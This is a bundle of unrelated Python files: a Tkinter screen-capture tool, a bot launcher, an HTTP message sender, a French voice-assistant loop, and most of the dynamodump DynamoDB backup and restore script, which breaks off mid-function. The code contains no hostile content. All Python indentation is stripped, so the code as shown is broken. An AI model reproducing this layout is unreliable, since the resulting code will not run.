bashCommand_Full = ""
bash_BaseOptions = 'screencapture -C -t jpg -x ' ## -t = type, -x = make no sound .. https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/screencapture.1.html
bash_ImageCount = '-' + getImageCount(image_Count)
bash_FileDate = strftime("%j-%H-%M-%S", gmtime())
bash_FilePath = bash_PathChar + Record_Path[0] + bash_FileDate + bash_ImageCount + bash_FileNameExt + bash_PathChar
if Screen_Type_Selected == Screen_Type[0]:
bashCommand_Full = bash_BaseOptions + bash_FilePath + ";"
else:
bashCommand_Full = bash_BaseOptions + bash_FilePath + " " + bash_FilePath + ";"
output = subprocess.call( [ 'bash' , '-c' , bashCommand_Full ] )
class Capture_Gui( tk.Frame ):
inProgress = False
currentSpeed = 1.0
def __init__(self, master=None):
tk.Frame.__init__(self, master)
self.grid()
self.Create_Gui()
self.Adjust_Speed()
# self.Toggle_OnFocus()
def Create_Gui(self):
        global Screen_Type
var = tk.StringVar()
self.checkVar = tk.IntVar()
self.captureButton = tk.Button( self, text='Capture', command = self.Button_StartPause, width = 5 )
self.ScreenOpts = tk.OptionMenu(self, var, *Screen_Type , command = self.Screen_Option )
self.ScreenOpts.config(width= 8)
var.set( Screen_Type[0] )
self.speedButton = tk.Button( self, text='1X', command = self.Button_Speed , width = 2 )
# self.AppFocusToggle = tk.Checkbutton( self, text='AppFocus', variable=self.checkVar, command = self.Toggle_OnFocus , width = 9 )
self.countValue = tk.Label( self, text="00" , width = 5 )
self.countTime = tk.Label( self, text="00:00:00" , width = 7 )
self.close_button = tk.Button(self, text="Close", command = self.Button_Close , width = 3 )
self.captureButton.grid(row=0, column=0 , sticky="ew" )
self.ScreenOpts.grid(row=0, column=1 , sticky="ew" )
self.speedButton.grid(row=0, column=2 , sticky="ew" )
# self.AppFocusToggle.grid(row=0, column=3 , sticky="ew" )
self.countTime.grid(row=0 , column =3 , sticky="ew" )
self.countValue.grid(row=0 , column =4 , sticky="ew" )
self.close_button.grid(row=0, column=5, sticky="ew" )
def Screen_Option( self , selectedList ):
global Screen_Type_Selected
Screen_Type_Selected = selectedList
def Label_Count_Time(self):
global Time_ReadOut
self.countTime.config( text = Time_ReadOut )
def Label_Count_Update(self):
global image_Count
self.Label_Count_Time()
self.countValue.config( text = image_Count )
def Button_StartPause(self):
if self.inProgress == False:
self.captureButton.config( text = "Pause " )
self.inProgress = True
Thread_Start( self.Label_Count_Update )
else:
self.captureButton.config( text = "Capture" )
self.inProgress = False
Thread_Stop()
# def Toggle_OnFocus(self):
# global AppFocus
# AppFocus = self.checkVar.get()
def Button_Speed(self):
if self.currentSpeed == 0.1:
self.currentSpeed = 1.0
self.speedButton.config( text = "1X" )
elif self.currentSpeed == 0.5:
self.currentSpeed = 0.1
self.speedButton.config( text = "10X" )
else:
self.currentSpeed = 0.5
self.speedButton.config( text = "5X" )
self.Adjust_Speed()
def Adjust_Speed( self ):
global Speed_Adjust
Speed_Adjust = Record_Speed * self.currentSpeed
def Button_Stop(self):
Thread_Stop()
def Button_Close(self):
Thread_Stop()
print("Closing!")
time.sleep(0.1)
sys.exit()
# if a path is injected in, override?
if( len( os.environ["captureLocation"] ) > 2 ):
Record_Path[0] = os.environ["captureLocation"]
print( "Capturing to location: " + str(Record_Path) );
my_gui = Capture_Gui()
my_gui.master.title( 'ScreenCapture: ' )
my_gui.master.geometry('400x28')
my_gui.master.resizable(0, 0)
my_gui.mainloop()
|
forgotten.py
|
# -*- coding: utf-8 -*-
#
# forgotten
# https://github.com/rmed/forgotten
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Rafael Medina García <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import signal
import sys
import threading
import time
from forgotten.conf import parse_conf, get_logger
# Setup logging
logger = get_logger('launcher')
# Parse config file
parse_conf()
# Initialize database
from forgotten.dbops import DB, check_db
check_db(DB)
# Initialize bot
from forgotten.bot import bot
# Initialize worker thread
from forgotten.helper import forgotten_worker
WORKER = threading.Thread(target=forgotten_worker, daemon=True)
WORKER.start()
def sigint_handler(signal, frame):
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, sigint_handler)
print('Press Control+C to exit')
while True:
try:
logger.info('Start polling')
bot.polling(none_stop=True)
except Exception as e:
logger.error(e)
logger.info('Start sleep')
time.sleep(10)
logger.info('Ended sleep')
pass
logger.info('Stop polling')
bot.stop_polling()
|
message_sender.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import json
import requests
import threading
import logging
from alfa_agent.core.api.util.util import Util
class MessageSender:
def __init__(self, url):
self.url = url
self.headers = {'content-type': 'application/json'}
def send(self, payload):
t = threading.Thread(target=worker, kwargs=dict(url=self.url, headers=self.headers, payload=payload))
t.start()
def worker(url=None, headers=None, payload=None):
logger = logging.getLogger(__name__)
try:
_payload = json.loads(payload) if type(payload) is str else payload
_payload['from'] = Util.read_prop("agent.messaging_id")
assert _payload['from']
logger.debug("Sending message with payload: {}".format(json.dumps(_payload)))
resp = requests.post(url, data=json.dumps(_payload), headers=headers)
logger.info("Sent message to url:" + url if resp is not None and resp.status_code == 200
else "Failed to send message to url:" + url)
except requests.exceptions.ConnectionError:
logger.error("Cannot connect to server.", exc_info=True)
|
main.py
|
from utils import *
from process import *
from server import run_server
import multiprocessing,requests
p = multiprocessing.Process(target=run_server, args=())
p.daemon = True
path_volume= abspath(__file__)+"_data/"
keyword= "ok assistant"
list_stop= get_tree_by_tag("start>stop")['keywords']
volumes={str(path_volume):{'bind': '/volume', 'mode': 'rw'}}
DEFAULT_HOST= "127.0.0.1"
DEFAULT_PORT= "5000"
def url(route="",host=DEFAULT_HOST,port=DEFAULT_PORT):
return 'http://'+host+':'+port+'/'+route
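# e.g. url("stop") -> "http://127.0.0.1:5000/stop" with the defaults above (the route name here is only illustrative)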
if __name__ == '__main__':
# show the assistant text line (Je suis votre assistant....)
show= True
# run server
p.start()
if not auth():
text_to_speech("l'authentification a échouée")
print("l'authentification a échouée")
else:
# sleep mode (waiting for the keyword)
while True:
if show:
print("\nJe suis votre assistant, dites: \n[\"ok assistant\"] pour m'appeler \n[\"quitter\"] pour quitter")
show= False
speech= speech_to_text("False")
# recognized a user request
if speech:
# if request is the keyword, then go to active mode
if keyword in speech:
show= True
# if mono-user mode is activated, then authentication
Tree()
# if request is something else, then stay in sleep mode
else:
stop= False
for word in list_stop:
if word in speech:
stop= True
if stop:
print("Fin de programme...")
break
p.terminate()
|
dynamodump.py
|
#!/usr/bin/env python
"""
Simple backup and restore script for Amazon DynamoDB using boto to work similarly to mysqldump.
Suitable for DynamoDB usages of smaller data volume which do not warrant the usage of AWS
Data Pipeline for backup/restores/empty.
dynamodump supports local DynamoDB instances as well (tested with DynamoDB Local).
"""
import argparse
import boto3
import datetime
import errno
import fnmatch
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import threading
import time
import zipfile
from queue import Queue
from six.moves import input
from urllib.error import URLError, HTTPError
from urllib.request import urlopen
AWS_SLEEP_INTERVAL = 10 # seconds
BATCH_WRITE_SLEEP_INTERVAL = 0.15 # seconds
DATA_DIR = "data"
DATA_DUMP = "dump"
DEFAULT_PREFIX_SEPARATOR = "-"
CURRENT_WORKING_DIR = os.getcwd()
JSON_INDENT = 2
LOCAL_REGION = "local"
LOCAL_SLEEP_INTERVAL = 1 # seconds
LOG_LEVEL = "INFO"
MAX_BATCH_WRITE = 25 # DynamoDB limit
MAX_NUMBER_BACKUP_WORKERS = 25
MAX_RETRY = 6
METADATA_URL = "http://169.254.169.254/latest/meta-data/"
PAY_PER_REQUEST_BILLING_MODE = "PAY_PER_REQUEST"
PROVISIONED_BILLING_MODE = "PROVISIONED"
RESTORE_WRITE_CAPACITY = 25
RESTORE_READ_CAPACITY = 25
SCHEMA_FILE = "schema.json"
THREAD_START_DELAY = 1 # seconds
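# Serialize datetime values (e.g. CreationDateTime in describe_table output) as ISO-8601 strings
# when dumping to JSON; any other type json cannot handle falls back to null.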
json.JSONEncoder.default = lambda self, obj: (
obj.isoformat() if isinstance(obj, datetime.datetime) else None
)
def _get_aws_client(
service: str,
profile: str = None,
region: str = None,
secret_key: str = None,
access_key: str = None,
endpoint_url: str = None,
):
"""
Build connection to some AWS service.
"""
if region:
aws_region = region
else:
aws_region = os.getenv("AWS_DEFAULT_REGION")
# Fallback to querying metadata for region
if not aws_region:
try:
azone = (
urlopen(
METADATA_URL + "placement/availability-zone", data=None, timeout=5
)
.read()
.decode()
)
aws_region = azone[:-1]
except HTTPError as e:
logging.exception(
"Error determining region used for AWS client. Typo in code?\n\n"
+ str(e)
)
sys.exit(1)
except URLError:
logging.exception("Timed out connecting to metadata service.\n\n")
sys.exit(1)
if profile:
session = boto3.Session(
profile_name=profile,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
)
client = session.client(service, region_name=aws_region)
else:
client = boto3.client(
service,
region_name=aws_region,
aws_access_key_id=access_key,
aws_secret_access_key=secret_key,
endpoint_url=endpoint_url,
)
return client
def get_table_name_by_tag(profile, region, tag):
"""
Using provided connection to dynamodb and tag, get all tables that have provided tag
Profile provided and, if needed, used to build connection to STS.
"""
matching_tables = []
all_tables = []
sts = _get_aws_client(profile=profile, region=region, service="sts")
dynamo = _get_aws_client(profile=profile, region=region, service="dynamodb")
account_number = sts.get_caller_identity().get("Account")
paginator = dynamo.get_paginator(operation_name="list_tables")
tag_key = tag.split("=")[0]
tag_value = tag.split("=")[1]
get_all_tables = paginator.paginate()
for page in get_all_tables:
for table in page["TableNames"]:
all_tables.append(table)
logging.debug("Found table " + table)
for table in all_tables:
table_arn = "arn:aws:dynamodb:{}:{}:table/{}".format(
region, account_number, table
)
table_tags = dynamo.list_tags_of_resource(ResourceArn=table_arn)
for found_tag in table_tags["Tags"]:
if found_tag["Key"] == tag_key:
logging.debug("Checking table " + table + " tag " + found_tag["Key"])
if found_tag["Value"] == tag_value:
matching_tables.append(table)
logging.info("Matched table " + table)
return matching_tables
def do_put_bucket_object(profile, region, bucket, bucket_object):
"""
Put object into bucket. Only called if we've also created an archive file with do_archive()
Bucket must exist prior to running this function.
profile could be None.
bucket_object is file to be uploaded
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
logging.info("Uploading backup to S3 bucket " + bucket)
try:
s3.upload_file(
bucket_object,
bucket,
bucket_object,
ExtraArgs={"ServerSideEncryption": "AES256"},
)
except s3.exceptions.ClientError as e:
logging.exception("Failed to put file to S3 bucket\n\n" + str(e))
sys.exit(1)
def do_get_s3_archive(profile, region, bucket, table, archive):
"""
Fetch latest file named filename from S3
Bucket must exist prior to running this function.
filename is args.dumpPath. File would be "args.dumpPath" with suffix .tar.bz2 or .zip
"""
s3 = _get_aws_client(profile=profile, region=region, service="s3")
if archive:
if archive == "tar":
archive_type = "tar.bz2"
else:
archive_type = "zip"
# Make sure bucket exists before continuing
try:
s3.head_bucket(Bucket=bucket)
except s3.exceptions.ClientError as e:
logging.exception(
"S3 bucket " + bucket + " does not exist. "
"Can't get backup file\n\n" + str(e)
)
sys.exit(1)
try:
contents = s3.list_objects_v2(Bucket=bucket, Prefix=args.dumpPath)
except s3.exceptions.ClientError as e:
logging.exception(
"Issue listing contents of bucket " + bucket + "\n\n" + str(e)
)
sys.exit(1)
# Script will always overwrite older backup. Bucket versioning stores multiple backups.
# Therefore, just get item from bucket based on table name since that's what we name the files.
filename = None
for d in contents["Contents"]:
if d["Key"] == "{}/{}.{}".format(args.dumpPath, table, archive_type):
filename = d["Key"]
if not filename:
logging.exception(
"Unable to find file to restore from. "
"Confirm the name of the table you're restoring."
)
sys.exit(1)
output_file = "/tmp/" + os.path.basename(filename)
logging.info("Downloading file " + filename + " to " + output_file)
s3.download_file(bucket, filename, output_file)
# Extract archive based on suffix
if tarfile.is_tarfile(output_file):
try:
logging.info("Extracting tar file...")
with tarfile.open(name=output_file, mode="r:bz2") as a:
a.extractall(path=".")
except tarfile.ReadError as e:
logging.exception("Error reading downloaded archive\n\n" + str(e))
sys.exit(1)
except tarfile.ExtractError as e:
# ExtractError is raised for non-fatal errors on extract method
logging.error("Error during extraction: " + str(e))
# Assuming zip file here since we're only supporting tar and zip at this time
else:
try:
logging.info("Extracting zip file...")
with zipfile.ZipFile(output_file, "r") as z:
z.extractall(path=".")
except zipfile.BadZipFile as e:
logging.exception("Problem extracting zip file\n\n" + str(e))
sys.exit(1)
def do_archive(archive_type, dump_path):
"""
Create compressed archive of dump_path.
Accepts archive_type of zip or tar and requires dump_path, directory added to archive
"""
archive_base = dump_path
if archive_type.lower() == "tar":
archive = archive_base + ".tar.bz2"
try:
logging.info("Creating tar file " + archive + "...")
with tarfile.open(name=archive, mode="w:bz2") as a:
for root, dirs, files in os.walk(archive_base):
for file in files:
a.add(os.path.join(root, file))
return True, archive
except tarfile.CompressionError as e:
logging.exception(
"compression method is not supported or the data cannot be"
" decoded properly.\n\n" + str(e)
)
sys.exit(1)
except tarfile.TarError as e:
logging.exception("Error creating tarfile archive.\n\n" + str(e))
sys.exit(1)
elif archive_type.lower() == "zip":
try:
logging.info("Creating zip file...")
archive = archive_base + ".zip"
with zipfile.ZipFile(archive, "w") as z:
for root, dirs, files in os.walk(archive_base):
for file in files:
z.write(os.path.join(root, file))
return True, archive
except zipfile.BadZipFile as e:
logging.exception("Problem creating zip file\n\n" + str(e))
sys.exit(1)
except zipfile.LargeZipFile:
logging.exception(
"Zip file would be too large. Update code to use Zip64 to continue."
)
sys.exit(1)
else:
logging.error(
"Unsupported archive format received. Probably shouldn't have "
"made it to this code path. Skipping attempt at creating archive file"
)
return False, None
def get_table_name_matches(conn, table_name_wildcard, separator):
"""
Find tables to backup
"""
all_tables = []
last_evaluated_table_name = None
while True:
optional_args = {}
if last_evaluated_table_name is not None:
optional_args["ExclusiveStartTableName"] = last_evaluated_table_name
table_list = conn.list_tables(**optional_args)
all_tables.extend(table_list["TableNames"])
try:
last_evaluated_table_name = table_list["LastEvaluatedTableName"]
except KeyError:
break
matching_tables = []
for table_name in all_tables:
if fnmatch.fnmatch(table_name, table_name_wildcard):
logging.info("Adding %s", table_name)
matching_tables.append(table_name)
return matching_tables
def get_restore_table_matches(table_name_wildcard, separator):
"""
Find tables to restore
"""
matching_tables = []
try:
dir_list = os.listdir("./" + args.dumpPath)
except OSError:
logging.info(
'Cannot find "./%s", Now trying user provided absolute dump path..'
% args.dumpPath
)
try:
dir_list = os.listdir(args.dumpPath)
except OSError:
logging.info(
'Cannot find "%s", Now trying current working directory..'
% args.dumpPath
)
dump_data_path = CURRENT_WORKING_DIR
try:
dir_list = os.listdir(dump_data_path)
except OSError:
logging.info(
'Cannot find "%s" directory containing dump files!' % dump_data_path
)
sys.exit(1)
for dir_name in dir_list:
if table_name_wildcard == "*":
matching_tables.append(dir_name)
elif separator == "":
if dir_name.startswith(
re.sub(
r"([A-Z])", r" \1", table_name_wildcard.split("*", 1)[0]
).split()[0]
):
matching_tables.append(dir_name)
elif dir_name.split(separator, 1)[0] == table_name_wildcard.split("*", 1)[0]:
matching_tables.append(dir_name)
return matching_tables
def change_prefix(source_table_name, source_wildcard, destination_wildcard, separator):
"""
Update prefix used for searching tables
"""
source_prefix = source_wildcard.split("*", 1)[0]
destination_prefix = destination_wildcard.split("*", 1)[0]
if separator == "":
if re.sub(r"([A-Z])", r" \1", source_table_name).split()[0] == source_prefix:
return destination_prefix + re.sub(
r"([A-Z])", r" \1", source_table_name
).split(" ", 1)[1].replace(" ", "")
if source_table_name.split(separator, 1)[0] == source_prefix:
return destination_prefix + separator + source_table_name.split(separator, 1)[1]
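# Worked example (hypothetical names): change_prefix("prod-users", "prod*", "stage*", "-") returns
# "stage-users"; if the source prefix does not match, the function falls through and returns None.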
def delete_table(conn, sleep_interval: int, table_name: str):
"""
Delete table table_name
"""
if not args.dataOnly:
if not args.noConfirm:
confirmation = input(
"About to delete table {}. Type 'yes' to continue: ".format(table_name)
)
if confirmation != "yes":
logging.warn("Confirmation not received. Stopping.")
sys.exit(1)
while True:
# delete table if exists
table_exist = True
try:
conn.delete_table(TableName=table_name)
except conn.exceptions.ResourceNotFoundException:
table_exist = False
logging.info(table_name + " table deleted!")
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying deletion of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying deletion of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceInUseException:
logging.info(table_name + " table is being deleted..")
time.sleep(sleep_interval)
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# if table exists, wait till deleted
if table_exist:
try:
while True:
logging.info(
"Waiting for "
+ table_name
+ " table to be deleted.. ["
+ conn.describe_table(table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
except conn.exceptions.ResourceNotFoundException:
logging.info(table_name + " table deleted.")
pass
except conn.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
def mkdir_p(path):
"""
Create directory to hold dump
"""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def batch_write(conn, sleep_interval, table_name, put_requests):
"""
Write data to table_name
"""
request_items = {table_name: put_requests}
i = 1
sleep = sleep_interval
while True:
response = conn.batch_write_item(RequestItems=request_items)
unprocessed_items = response["UnprocessedItems"]
if len(unprocessed_items) == 0:
break
if len(unprocessed_items) > 0 and i <= MAX_RETRY:
logging.debug(
str(len(unprocessed_items))
+ " unprocessed items, retrying after %s seconds.. [%s/%s]"
% (str(sleep), str(i), str(MAX_RETRY))
)
request_items = unprocessed_items
time.sleep(sleep)
sleep += sleep_interval
i += 1
else:
logging.info(
"Max retries reached, failed to processed batch write: "
+ json.dumps(unprocessed_items, indent=JSON_INDENT)
)
logging.info("Ignoring and continuing..")
break
def wait_for_active_table(conn, table_name, verb):
"""
Wait for table to be in the desired state
"""
while True:
if (
conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
!= "ACTIVE"
):
logging.info(
"Waiting for "
+ table_name
+ " table to be "
+ verb
+ ".. ["
+ conn.describe_table(TableName=table_name)["Table"]["TableStatus"]
+ "]"
)
time.sleep(sleep_interval)
else:
logging.info(table_name + " " + verb + ".")
break
def update_provisioned_throughput(
conn, table_name, read_capacity, write_capacity, wait=True
):
"""
Update provisioned throughput on the table to provided values
"""
logging.info(
"Updating "
+ table_name
+ " table read capacity to: "
+ str(read_capacity)
+ ", write capacity to: "
+ str(write_capacity)
)
while True:
try:
conn.update_table(
TableName=table_name,
ProvisionedThroughput={
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
},
)
break
except conn.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of " + table_name + ".."
)
time.sleep(sleep_interval)
except conn.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput "
"of " + table_name + ".."
)
time.sleep(sleep_interval)
# wait for provisioned throughput update completion
if wait:
wait_for_active_table(conn, table_name, "updated")
def do_empty(dynamo, table_name, billing_mode):
"""
Empty table named table_name
"""
logging.info("Starting Empty for " + table_name + "..")
# get table schema
logging.info("Fetching table schema for " + table_name)
table_data = dynamo.describe_table(TableName=table_name)
table_desc = table_data["Table"]
table_attribute_definitions = table_desc["AttributeDefinitions"]
table_key_schema = table_desc["KeySchema"]
original_read_capacity = table_desc["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table_desc["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table_desc.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table_desc.get("GlobalSecondaryIndexes")
optional_args = {}
if billing_mode == PROVISIONED_BILLING_MODE:
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = table_global_secondary_indexes
table_provisioned_throughput = {
"ReadCapacityUnits": int(original_read_capacity),
"WriteCapacityUnits": int(original_write_capacity),
}
logging.info("Deleting Table " + table_name)
delete_table(dynamo, sleep_interval, table_name)
logging.info("Creating Table " + table_name)
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info("Limit exceeded, retrying creation of " + table_name + "..")
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying creation of "
+ table_name
+ ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, table_name, "created")
logging.info(
"Recreation of "
+ table_name
+ " completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def do_backup(dynamo, read_capacity, tableQueue=None, srcTable=None):
"""
Connect to DynamoDB and perform the backup for srcTable or each table in tableQueue
"""
if srcTable:
table_name = srcTable
if tableQueue:
while True:
table_name = tableQueue.get()
if table_name is None:
break
logging.info("Starting backup for " + table_name + "..")
# trash data, re-create subdir
if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
# Give up on this table; its queue item is marked done once at the end of the loop.
break
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
with the provisioned throughput attribute
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the payload returned for the boto3 API call create_table is compatible
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
def do_restore(
dynamo,
sleep_interval,
source_table,
destination_table,
write_capacity,
billing_mode,
):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", Now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
read_capacity = RESTORE_READ_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
optional_args = {}
if billing_mode == PROVISIONED_BILLING_MODE:
optional_args["ProvisionedThroughput"] = table_provisioned_throughput
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
BillingMode=billing_mode,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
